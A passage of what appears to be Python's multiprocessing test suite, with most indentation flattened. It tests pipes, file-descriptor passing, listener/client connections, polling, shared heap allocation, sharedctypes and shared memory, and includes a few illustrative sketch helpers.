conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
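
#
# Illustrative sketch (not part of the tests): the Listener/Client handshake
# exercised by _TestListener and _TestListenerClient below, using the objects
# as context managers.  A thread stands in for the client process purely to
# keep the sketch self-contained.
#
def _sketch_listener_client():
    import threading
    from multiprocessing.connection import Listener, Client

    with Listener() as listener:
        def _talk():
            with Client(listener.address) as conn:
                conn.send('hello')

        t = threading.Thread(target=_talk)
        t.start()
        with listener.accept() as served:       # blocks until the client connects
            assert served.recv() == 'hello'
        t.join()
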
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle. This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
        # Polling may "pull" a message into the child process, but we
        # don't want it to pull only part of a message, as that would
        # corrupt the pipe for any other processes which might later
        # read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
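
#
# Illustrative sketch (not part of the tests): passing one end of a pipe to a
# child process through another connection, as _TestPicklingConnections does
# below.  Connection objects are pickled via multiprocessing.reduction, so this
# only works when HAS_REDUCTION is true; the helper names are hypothetical.
#
def _sketch_connection_writer_child(conn):
    # Child side: receive a Connection object, write through it, clean up.
    received = conn.recv()
    received.send('written by the child')
    received.close()
    conn.close()

def _sketch_send_connection_to_child():
    import multiprocessing

    r, w = multiprocessing.Pipe(duplex=False)
    conn, child_conn = multiprocessing.Pipe()
    p = multiprocessing.Process(target=_sketch_connection_writer_child,
                                args=(child_conn,))
    p.start()
    child_conn.close()
    conn.send(w)          # the writable end is pickled and shipped to the child
    w.close()
    msg = r.recv()        # data written by the child arrives on the local end
    p.join()
    conn.close()
    r.close()
    return msg
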
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
        # Make a pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
        # test freeing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
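
#
# Illustrative sketch (not part of the tests): the synchronized Value/Array
# wrappers exercised by _TestSharedCTypes below.  Requires _ctypes, matching
# the HAS_SHAREDCTYPES guard used in setUp().
#
def _sketch_sharedctypes():
    from multiprocessing import Value, Array

    counter = Value('i', 0)           # synchronized wrapper around a c_int
    samples = Array('d', [0.0] * 4)   # synchronized wrapper around c_double[4]
    with counter.get_lock():          # explicit lock around read-modify-write
        counter.value += 1
    samples[0] = 2.5
    return counter.value, list(samples)
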
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
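
#
# Illustrative sketch (not part of the tests): the basic SharedMemory and
# ShareableList lifecycle exercised by _TestSharedMemory below -- create a
# block, attach to it by name from a second handle, then close and unlink.
# Requires multiprocessing.shared_memory (the HAS_SHMEM guard below).
#
def _sketch_shared_memory_lifecycle():
    from multiprocessing import shared_memory

    block = shared_memory.SharedMemory(create=True, size=16)
    try:
        block.buf[:5] = b'hello'
        attached = shared_memory.SharedMemory(block.name)   # attach by name
        data = bytes(attached.buf[:5])
        attached.close()

        sl = shared_memory.ShareableList(['howdy', 42, None])
        try:
            first = sl[0]           # typed access backed by the shared block
        finally:
            sl.shm.close()
            sl.shm.unlink()
        return data, first
    finally:
        block.close()
        block.unlink()              # actually releases the block (POSIX semantics)
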
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def _new_shm_name(self, prefix):
# Add a PID to the name of a POSIX shared memory object to allow
# running multiprocessing tests (test_multiprocessing_fork,
# test_multiprocessing_spawn, etc) in parallel.
return prefix + str(os.getpid())
def test_shared_memory_basics(self):
name_tsmb = self._new_shm_name('test01_tsmb')
sms = shared_memory.SharedMemory(name_tsmb, create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, name_tsmb)
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Verify __repr__
self.assertIn(sms.name, str(sms))
self.assertIn(str(sms.size), str(sms))
# Test pickling
sms.buf[0:6] = b'pickle'
pickled_sms = pickle.dumps(sms)
sms2 = pickle.loads(pickled_sms)
self.assertEqual(sms.name, sms2.name)
self.assertEqual(bytes(sms.buf[0:6]), bytes(sms2.buf[0:6]), b'pickle')
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory(name_tsmb)
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory(name_tsmb, size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
        # Creating a shared memory segment with a negative size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
        # Attaching to a shared memory segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
        # Test that the shared memory segment is created properly
        # when _make_filename returns an existing shared memory segment name.
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = [self._new_shm_name('test01_fn'), self._new_shm_name('test02_fn')]
            # Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
            # because some POSIX compliant systems require the name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
            # POSIX shared memory can only be unlinked once. Here we
            # test an implementation detail that is not observed across
            # all supported platforms (since WindowsNamedSharedMemory
            # manages unlinking on its own and unlink() does nothing).
            # True release of the shared memory segment does not necessarily
            # happen until the process exits, depending on the OS platform.
name_dblunlink = self._new_shm_name('test01_dblunlink')
sms_uno = shared_memory.SharedMemory(
name_dblunlink,
create=True,
size=5000
)
with self.assertRaises(FileNotFoundError):
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory(name_dblunlink)
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
name_tsmb,
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
            # Note: Using a smaller size could possibly cause truncation of
            # the existing segment but is OS platform dependent. In the
            # case of macOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory(name_tsmb)
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
# Test creating a shared memory segment with negative size
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=-1)
# Test creating a shared memory segment with size 0
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=0)
# Test creating a shared memory segment without size argument
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True)
def test_shared_memory_across_processes(self):
        # bpo-40135: don't define the shared memory block's name, to avoid
        # failures when multiprocessing tests are run in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
        # the manager's server should ignore KeyboardInterrupt signals,
        # maintain its connection with the current process, and succeed
        # when asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
            # Calls to unlink() have no effect on the Windows platform; shared
            # memory will only be released once the final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify __repr__
self.assertIn(sl.shm.name, str(sl))
self.assertIn(str(list(sl)), str(sl))
# Index Out of Range (get)
with self.assertRaises(IndexError):
sl[7]
# Index Out of Range (set)
with self.assertRaises(IndexError):
sl[7] = 2
# Assign value without format change (str -> str)
current_format = sl._get_packing_format(0)
sl[0] = 'howdy'
self.assertEqual(current_format, sl._get_packing_format(0))
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
name_duplicate = self._new_shm_name('test03_duplicate')
sl_copy = shared_memory.ShareableList(sl, name=name_duplicate)
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual(name_duplicate, sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
            # abruptly killing processes that hold a reference to a shared
            # memory segment should not leak that segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
